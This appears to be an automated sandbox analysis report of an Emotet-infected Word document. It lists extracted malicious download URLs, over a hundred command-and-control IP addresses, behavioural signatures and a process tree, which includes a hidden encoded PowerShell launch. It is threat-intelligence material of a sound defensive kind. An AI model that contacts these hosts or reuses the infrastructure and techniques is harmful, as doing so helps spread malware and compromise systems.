Analysis
- max time kernel: 28s
- resource: win10v191014
- submitted: 27-01-2020 20:29
General
Malware Config
Extracted (URLs):
https://fietsenmetkinderen.info/App_Data/ASHFouI/
https://rokonworld.xyz/cgi-bin/bf99ypv-nka70qs-62/
http://www.meubelontwerpstudioheyne.nl/languages/ndZNarqnj/
http://bursary.engsoc.queensu.ca/wp-admin/48ech-ddpjkzp-29821620/
http://lapmangfpt.haiphong.vn/wp-admin/k50i2cm5qi-9wnfau-7879373385/
Extracted (emotet):
195.250.143.182:80
184.162.115.11:443
70.60.238.62:80
68.183.18.169:8080
178.62.75.204:8080
178.33.167.120:8080
144.76.56.36:8080
216.75.37.196:8080
78.189.165.52:8080
185.192.75.240:443
202.229.211.95:80
190.5.162.204:80
24.141.12.228:80
41.185.29.128:8080
192.210.217.94:8080
110.2.118.164:80
203.153.216.178:7080
37.70.131.107:80
75.86.6.174:80
122.176.116.57:443
88.247.53.159:443
75.127.14.170:8080
91.117.31.181:80
122.116.104.238:7080
177.103.240.93:80
179.5.118.12:8080
78.188.170.128:80
5.196.200.208:8080
41.215.79.182:80
82.146.55.23:7080
212.112.113.235:80
212.129.14.27:8080
187.72.47.161:443
42.51.192.231:8080
88.248.140.80:80
88.247.26.78:80
98.192.74.164:80
78.189.60.109:443
82.145.43.153:8080
182.74.249.74:80
80.211.32.88:8080
95.9.217.200:8080
72.27.212.209:8080
46.17.6.116:8080
160.226.171.255:443
81.82.247.216:80
81.214.142.115:80
69.30.205.162:7080
61.221.152.140:80
142.93.87.198:8080
160.119.153.20:80
175.181.7.188:80
153.183.25.24:80
180.33.71.88:80
182.176.116.139:995
77.74.78.80:443
186.84.173.136:8080
183.82.123.60:443
190.93.210.113:80
72.176.87.136:80
51.77.113.97:8080
172.104.70.207:8080
175.127.140.68:80
201.183.251.100:80
211.20.154.102:80
200.82.88.254:80
95.130.37.244:443
186.147.245.204:80
139.59.12.63:8080
58.185.224.18:80
70.45.30.28:80
220.247.70.174:80
195.201.56.70:8080
196.6.119.137:80
14.161.30.33:443
185.207.57.205:443
91.117.131.122:80
154.73.137.131:80
85.109.190.235:443
59.135.126.129:443
150.246.246.238:80
37.211.67.229:80
162.144.46.90:8080
177.144.130.105:443
176.58.93.123:80
78.210.132.35:80
78.46.87.133:8080
210.111.160.220:80
203.124.57.50:80
85.100.122.211:80
50.116.78.109:8080
88.225.230.33:80
98.178.241.106:80
23.253.207.142:8080
82.79.244.92:80
112.186.195.176:80
61.204.119.188:443
1.221.254.82:80
187.177.155.123:990
110.142.161.90:80
157.7.164.178:8081
1.217.126.11:443
78.186.102.195:80
163.172.107.70:8080
91.83.93.103:443
217.12.70.226:80
156.155.163.232:80
58.93.151.148:80
144.139.91.187:80
89.215.225.15:80
82.165.15.188:8080
183.91.3.63:80
190.17.94.108:443
37.46.129.215:8080
58.92.179.55:443
181.39.96.86:443
98.15.140.226:80
60.152.212.149:80
41.77.74.214:443
190.171.153.139:80
60.130.173.117:80
162.154.175.215:80
46.32.229.152:8080
183.87.40.21:8080
211.229.116.130:80
180.16.248.25:80
186.223.86.136:443
Signatures
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes:
    pid | process
    4996 | WINWORD.EXE
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3604 | Powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description | pid | process | target process
    PID 3604 wrote to memory of 4764 | 3604 | Powershell.exe | 491.exe
    PID 4764 wrote to memory of 4756 | 4764 | 491.exe | 491.exe
    PID 4420 wrote to memory of 3724 | 4420 | timeouttargets.exe | timeouttargets.exe
- Suspicious behavior: EmotetMutantsSpam (2 IoCs)
  Processes:
    pid | process
    4756 | 491.exe
    3724 | timeouttargets.exe
- Drops file in System32 directory (1 IoCs)
  Processes:
    description | ioc | process
    File renamed | C:\Users\Admin\491.exe => C:\Windows\SysWOW64\timeouttargets.exe | 491.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes:
    pid | process
    4996 | WINWORD.EXE
    4764 | 491.exe
    4756 | 491.exe
    4420 | timeouttargets.exe
    3724 | timeouttargets.exe
- Process spawned unexpected child process (1 IoCs)
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3604 | 5068 | Powershell.exe |
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid | process
    3604 | Powershell.exe
- Executes dropped EXE (4 IoCs)
  Processes:
    pid | process
    4764 | 491.exe
    4756 | 491.exe
    4420 | timeouttargets.exe
    3724 | timeouttargets.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (tree level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e16aaeed5f48de4896425925bfbdd114b6e826d637a742994234703ea8cd20ee.doc" /o ""
  Signatures:
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (tree level 1)
  Command line: Powershell -w hidden -en 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
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
- C:\Users\Admin\491.exe (tree level 2)
  Command line: "C:\Users\Admin\491.exe"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
- C:\Users\Admin\491.exe (tree level 3)
  Command line: --7c8dd3ca
  Signatures:
  - Suspicious behavior: EmotetMutantsSpam
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
- C:\Windows\SysWOW64\timeouttargets.exe (tree level 1)
  Command line: "C:\Windows\SysWOW64\timeouttargets.exe"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
- C:\Windows\SysWOW64\timeouttargets.exe (tree level 2)
  Command line: --c529e513
  Signatures:
  - Suspicious behavior: EmotetMutantsSpam
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\491.exe
- C:\Users\Admin\491.exe
- C:\Users\Admin\491.exe
- C:\Windows\SysWOW64\timeouttargets.exe
- C:\Windows\SysWOW64\timeouttargets.exe
- memory/3724-13-0x0000000000500000-0x0000000000517000-memory.dmp (Filesize: 92KB)
- memory/3724-14-0x0000000000400000-0x000000000045C000-memory.dmp (Filesize: 368KB)
- memory/4420-11-0x0000000000570000-0x0000000000587000-memory.dmp (Filesize: 92KB)
- memory/4756-8-0x0000000002020000-0x0000000002037000-memory.dmp (Filesize: 92KB)
- memory/4756-9-0x0000000000400000-0x000000000045C000-memory.dmp (Filesize: 368KB)
- memory/4764-6-0x0000000002280000-0x0000000002297000-memory.dmp (Filesize: 92KB)